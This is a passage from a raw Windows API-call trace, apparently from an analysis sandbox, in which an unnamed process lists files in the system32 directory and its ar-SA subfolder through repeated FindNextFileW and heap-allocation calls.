dwReserved1=0x0, cFileName="appmgmts.dll", cAlternateFileName="")) returned 1 [0025.926] lstrlenW (lpString="appmgmts.dll") returned 12 [0025.926] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d3f80 [0025.926] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c14fdd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1c14fdd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1c6129e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x53000, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgr.dll", cAlternateFileName="")) returned 1 [0025.926] lstrlenW (lpString="appmgr.dll") returned 10 [0025.926] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d4028 [0025.926] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f6f58ca, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8f6f58ca, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8f6f58ca, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="appwiz.cpl", cAlternateFileName="")) returned 1 [0025.926] lstrlenW (lpString="appwiz.cpl") returned 10 [0025.926] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc81f8794, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc81f8794, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e6eb6d0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x30e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apss.dll", cAlternateFileName="")) returned 1 [0025.926] lstrlenW (lpString="apss.dll") returned 8 [0025.926] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x92) returned 0x5d40e0 [0025.927] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0025.927] lstrlenW (lpString="ar-SA") returned 5 [0025.927] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5d60c8 [0025.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\ar-SA\\*", lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.928] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0025.928] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2e2f2c, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcd70d590, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcd70d590, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="cdosys.dll.mui", cAlternateFileName="")) returned 1 [0025.929] lstrlenW (lpString="cdosys.dll.mui") returned 14 [0025.929] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd8641e7, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcdbaa011, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcdbaa011, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0025.929] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0025.929] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc973a95d, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xca5a8e5c, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xca5a8e5c, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0025.929] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0025.929] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24606e1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc29bb83d, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc29e199c, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0025.929] lstrlenW (lpString="fms.dll.mui") returned 11 [0025.929] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6374c39, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc672ce80, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc672ce80, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0025.929] lstrlenW (lpString="mlang.dll.mui") returned 13 [0025.929] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc578de89, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc5ce8fe5, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc5ce8fe5, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0025.929] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0025.929] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c657b4, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc4f5f320, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc4f5f320, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msprivs.dll.mui", cAlternateFileName="")) returned 1 [0025.929] lstrlenW (lpString="msprivs.dll.mui") returned 15 [0025.929] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d60c8 | out: lpFindFileData=0x5d60c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c657b4, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc4f5f320, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc4f5f320, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msprivs.dll.mui", cAlternateFileName="")) returned 0 [0025.929] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d60c8 | out: hHeap=0x5a0000) returned 1 [0025.930] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bf02cff, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5bf02cff, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x656df510, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARP.EXE", cAlternateFileName="")) returned 1 [0025.930] lstrlenW (lpString="ARP.EXE") returned 7 [0025.930] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x90) returned 0x5d60c8 [0025.930] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31c9efbc, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x31c9efbc, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xf2a6d430, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="asferror.dll", cAlternateFileName="")) returned 1 [0025.930] lstrlenW (lpString="asferror.dll") returned 12 [0025.930] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6160 [0025.931] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x57090500, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_counters.dll", cAlternateFileName="ASPNET~1.DLL")) returned 1 [0025.931] lstrlenW (lpString="aspnet_counters.dll") returned 19 [0025.931] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa8) returned 0x5d6208 [0025.931] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e661b3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84e661b3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84e661b3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="asycfilt.dll", cAlternateFileName="")) returned 1 [0025.931] lstrlenW (lpString="asycfilt.dll") returned 12 [0025.931] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d62b8 [0025.931] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9839a69, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe9839a69, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x658ceec0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="at.exe", cAlternateFileName="")) returned 1 [0025.931] lstrlenW (lpString="at.exe") returned 6 [0025.931] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8e) returned 0x5d6360 [0025.931] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaedcb3c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xfaedcb3c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x658f38b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AtBroker.exe", cAlternateFileName="")) returned 1 [0025.931] lstrlenW (lpString="AtBroker.exe") returned 12 [0025.931] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d63f8 [0025.931] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2b74b, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x2d2b74b, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x805466c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl.dll", cAlternateFileName="")) returned 1 [0025.931] lstrlenW (lpString="atl.dll") returned 7 [0025.931] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x90) returned 0x5d64a0 [0025.931] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b0b4600, ftCreationTime.dwHighDateTime=0x1cc2787, ftLastAccessTime.dwLowDateTime=0xcc438260, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x4b0b4600, ftLastWriteTime.dwHighDateTime=0x1cc2787, nFileSizeHigh=0x0, nFileSizeLow=0x21b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl100.dll", cAlternateFileName="")) returned 1 [0025.931] lstrlenW (lpString="atl100.dll") returned 10 [0025.931] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d4180 [0025.932] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b8ce00, ftCreationTime.dwHighDateTime=0x1ce64f7, ftLastAccessTime.dwLowDateTime=0xef797c80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x29b8ce00, ftLastWriteTime.dwHighDateTime=0x1ce64f7, nFileSizeHigh=0x0, nFileSizeLow=0x28248, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl110.dll", cAlternateFileName="")) returned 1 [0025.932] lstrlenW (lpString="atl110.dll") returned 10 [0025.932] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d4220 [0025.932] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9363019e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9363019e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x936562fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmfd.dll", cAlternateFileName="")) returned 1 [0025.932] lstrlenW (lpString="atmfd.dll") returned 9 [0025.932] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x94) returned 0x5d42c0 [0025.932] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9360a03e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9360a03e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9363019e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmlib.dll", cAlternateFileName="")) returned 1 [0025.932] lstrlenW (lpString="atmlib.dll") returned 10 [0025.932] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d4360 [0025.932] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf3c4130, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0xbf3c4130, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x658f38b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="attrib.exe", cAlternateFileName="")) returned 1 [0025.932] lstrlenW (lpString="attrib.exe") returned 10 [0025.932] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d4400 [0025.932] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4204ec3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4204ec3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4204ec3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="audiodev.dll", cAlternateFileName="")) returned 1 [0025.932] lstrlenW (lpString="audiodev.dll") returned 12 [0025.932] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6538 [0025.932] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78f79a81, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x78f79a81, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x80675280, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioEng.dll", cAlternateFileName="")) returned 1 [0025.932] lstrlenW (lpString="AudioEng.dll") returned 12 [0025.932] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d65f8 [0025.933] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce47270e, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xce47270e, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xad59f9a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6c200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUDIOKSE.dll", cAlternateFileName="")) returned 1 [0025.933] lstrlenW (lpString="AUDIOKSE.dll") returned 12 [0025.933] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d66a0 [0025.933] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87266eb6, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x87266eb6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x87266eb6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2fc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioSes.dll", cAlternateFileName="")) returned 1 [0025.933] lstrlenW (lpString="AudioSes.dll") returned 12 [0025.933] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6748 [0025.933] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ceb7bb, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x68ceb7bb, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80733960, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x35000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditNativeSnapIn.dll", cAlternateFileName="")) returned 1 [0025.933] lstrlenW (lpString="AuditNativeSnapIn.dll") returned 21 [0025.933] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xac) returned 0x5d85e0 [0025.933] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735a0a8d, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x735a0a8d, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x65a00190, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc400, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpol.exe", cAlternateFileName="")) returned 1 [0025.933] lstrlenW (lpString="auditpol.exe") returned 12 [0025.933] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d67f0 [0025.933] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1010d4, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x6a1010d4, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80733960, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditPolicyGPInterop.dll", cAlternateFileName="")) returned 1 [0025.933] lstrlenW (lpString="AuditPolicyGPInterop.dll") returned 24 [0025.933] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xb2) returned 0x5d8698 [0025.933] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6732ea88, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x6732ea88, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xf6ab4570, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x17400, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpolmsg.dll", cAlternateFileName="")) returned 1 [0025.933] lstrlenW (lpString="auditpolmsg.dll") returned 15 [0025.933] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa0) returned 0x5d6898 [0025.933] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb08b31c, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xb08b31c, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x808b0720, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x51a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="authfwcfg.dll", cAlternateFileName="")) returned 1 [0025.934] lstrlenW (lpString="authfwcfg.dll") returned 13 [0025.934] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9c) returned 0x5d6940 [0025.934] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a14413, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x9a14413, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x808fe920, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x48a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWGP.dll", cAlternateFileName="")) returned 1 [0025.934] lstrlenW (lpString="AuthFWGP.dll") returned 12 [0025.934] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d69e8 [0025.934] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aed7d9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9aed7d9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9af4a1bd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4d5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWSnapin.dll", cAlternateFileName="")) returned 1 [0025.934] lstrlenW (lpString="AuthFWSnapin.dll") returned 16 [0025.934] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa2) returned 0x5d8758 [0025.934] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0eeeaef, ftCreationTime.dwHighDateTime=0x1ca0406, ftLastAccessTime.dwLowDateTime=0xcd1a5500, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0x3931bcc5, ftLastWriteTime.dwHighDateTime=0x1ca0421, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWWizFwk.dll", cAlternateFileName="")) returned 1 [0025.934] lstrlenW 